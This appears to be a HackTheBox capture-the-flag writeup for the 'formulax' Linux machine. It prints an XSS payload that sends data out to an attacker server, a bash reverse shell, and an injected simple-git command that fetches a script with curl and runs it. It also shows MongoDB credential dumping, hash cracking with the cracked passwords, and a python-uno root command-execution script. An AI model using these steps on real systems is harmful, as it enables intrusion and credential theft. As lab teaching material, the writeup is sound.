HTB: formulax Writeup

Machine Information

Attribute	Details
Name	formulax
OS	Linux
Difficulty	Hard
Points	N/A
Release Date	N/A
IP Address	`10.10.14.80`
Author	D3vnomi

Machine Rating

⭐⭐⭐⭐☆ (8.0/10)

Difficulty Assessment:

Enumeration: ⭐⭐⭐⭐☆
Real-world: ⭐⭐⭐⭐☆
CVE: ⭐⭐⭐☆☆
CTF-like: ⭐⭐⭐⭐☆

formulax is a Hard-difficulty Linux machine. The exploitation path involves initial enumeration and service discovery, gaining an initial foothold through the identified vulnerability, lateral movement or credential extraction for user access, and finally privilege escalation to root/administrator.

TL;DR: Enumeration → Foothold → User credentials → Privilege escalation → Root.

Reconnaissance

Port Scanning

nmap -sC -sV -T4 -p- 10.10.14.80

Results:

80/tcp open http

Service Enumeration

Hostnames:

chatbot.htb (main application)
dev-git-auto-update.chatbot.htb (git auto-update service)

Technologies Identified:

Node.js (Socket.IO-based chatbot)
MongoDB (user database)
LibreNMS (network monitoring)
LibreOffice (office suite with UNO API)

echo "10.10.14.80 chatbot.htb dev-git-auto-update.chatbot.htb" >> /etc/hosts

Initial Foothold

Step 1: XSS via Socket.IO to Subdomain Discovery

The chatbot application contains an XSS vulnerability in the chat interface. By injecting a malicious payload using Socket.IO, we can exfiltrate chat history and discover hidden subdomains.

XSS Payload:

<img SRC=x onerror='eval(atob("..."))' />

Decoded payload functionality:

Loads Socket.IO library
Connects to the chat server
Emits ‘client_message’ with ‘history’ request
Exfiltrates chat data via fetch to attacker’s server

This reveals the dev-git-auto-update.chatbot.htb subdomain.

Step 2: RCE via simple-git Vulnerability (SNYK-JS-SIMPLEGIT-3112221)

The git auto-update service is vulnerable to command injection through the simple-git package.

Exploitation Steps:

Add dev-git-auto-update.chatbot.htb to /etc/hosts:

echo "10.10.14.80 dev-git-auto-update.chatbot.htb" >> /etc/hosts

Create rev.sh with bash reverse shell:

cat > rev.sh << 'EOF'
bash -i >& /dev/tcp/10.10.14.80/4444 0>&1
EOF

Host the reverse shell:

python3 -m http.server 8000

Intercept the git update request and set destinationURL to:

ext::sh -c curl% http://attacker:8000/rev.sh|bash >&2

This bypasses the simple-git validation and achieves RCE as www-data.

Step 3: MongoDB Credential Extraction

Access MongoDB locally and extract user credentials:

mongo
use testing
db.users.find()

Users Found:

admin@chatbot.htb
frank_dorky@chatbot.htb (bcrypt hash: $2b$10$hrB/by.tb/4ABJbbt1l4/ep/L4CTY6391eSETamjLp7s.elpsB4J6)

Crack hash with hashcat:

hashcat -m 3200 hash.txt wordlist.txt
# Result: manchesterunited

SSH Access:

ssh frank_dorky@chatbot.htb
# Password: manchesterunited

User Compromise

Lateral Movement: frank_dorky → kai_relay

With frank_dorky access, enumerate LibreNMS configuration for database credentials:

cd /opt/librenms
./config_to_json.php | grep "kai_relay"

Credentials Found:

User: kai_relay
Password: mychemicalformulaX

SSH as kai_relay:

ssh kai_relay@chatbot.htb
# Password: mychemicalformulaX

User Flag

cat ~/user.txt

🚩 User Flag: <REDACTED>

Privilege Escalation

Enumeration

sudo -l
# Output: User kai_relay may run /usr/bin/office.sh without password

The kai_relay user can run /usr/bin/office.sh with sudo, which starts LibreOffice with UNO API listening on localhost:2002.

Exploitation: LibreOffice UNO API Remote Command Execution

LibreOffice’s UNO API allows arbitrary command execution when the bridge is exposed. The office.sh script starts LibreOffice listening for UNO connections.

Exploitation Steps:

Terminal 1 - Start LibreOffice:

ssh kai_relay@chatbot.htb
sudo /usr/bin/office.sh
# This starts LibreOffice UNO API on localhost:2002

Terminal 2 - Execute exploit:

ssh kai_relay@chatbot.htb
# Create and run exploit.py
python3 exploit.py

exploit.py:

import uno
from com.sun.star.beans import PropertyValue

local = uno.getComponentContext()
resolver = local.ServiceManager.createInstanceWithContext(
    "com.sun.star.bridge.UnoUrlResolver", local)

context = resolver.resolve(
    "uno:socket,host=localhost,port=2002;urp;StarOffice.ComponentContext")

rc = context.ServiceManager.createInstanceWithContext(
    "com.sun.star.system.SystemShellExecute", context)

# Execute command as root (since office.sh runs with sudo)
rc.execute("/usr/bin/cat", "/root/root.txt", 1)

This leverages the python-uno bridge to connect to LibreOffice and execute arbitrary commands with root privileges.

Root Flag

cat /root/root.txt

🚩 Root Flag: <REDACTED>

Attack Chain Summary

graph TD
    A["Service Enumeration<br/>chatbot.htb"] -->|XSS Discovery| B["Subdomain Found<br/>dev-git-auto-update.chatbot.htb"]
    B -->|Simple-Git RCE| C["RCE as www-data<br/>SNYK-JS-SIMPLEGIT-3112221"]
    C -->|MongoDB Access| D["Extract Credentials<br/>frank_dorky:manchesterunited"]
    D -->|SSH Login| E["User Access<br/>frank_dorky"]
    E -->|Config Enumeration| F["Discover Credentials<br/>kai_relay:mychemicalformulaX"]
    F -->|SSH Login| G["Lateral Movement<br/>kai_relay"]
    G -->|Sudo office.sh| H["LibreOffice UNO API<br/>localhost:2002"]
    H -->|python-uno RCE| I["Root Access<br/>Command Execution"]

Tools Used

Tool	Purpose
`nmap`	Network port and service scanning
`Burp Suite`	HTTP request interception and manipulation
`Python`	Socket.IO XSS payload creation and python-uno exploitation
`hashcat`	Bcrypt password hash cracking
`mongo`	MongoDB database access and credential extraction
`ssh`	Secure shell access for lateral movement
`python3 -m http.server`	Simple HTTP server for serving reverse shell
`python-uno`	LibreOffice UNO bridge for command execution

Key Learnings

XSS to Subdomain Discovery: XSS vulnerabilities in client-side applications can be leveraged to discover hidden services and infrastructure through exfiltration attacks.
Known CVE Exploitation: Simple-git and similar package vulnerabilities (SNYK-JS-SIMPLEGIT-3112221) can lead to direct RCE if not patched. Always monitor and apply security updates.
Database Access: Unprotected MongoDB instances on localhost are critical — they often contain plaintext passwords or crackable hashes for lateral movement.
Configuration Enumeration: Application config files (especially in /opt directories) frequently contain hardcoded credentials for other services.
Privileged Service Misuse: Services running with sudo privileges (like office.sh) can be abused if they expose APIs (UNO) without proper authentication or isolation.
UNO API Security: LibreOffice’s UNO bridge should never be exposed on network interfaces without authentication — it allows arbitrary command execution.
Multi-stage Lateral Movement: This machine demonstrates the importance of methodically escalating privileges through discovered credentials rather than expecting a single vector to root.

Author

D3vnomi

Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.

Last Updated: 08 Mar 2026

Tags: #HackTheBox #Linux #Hard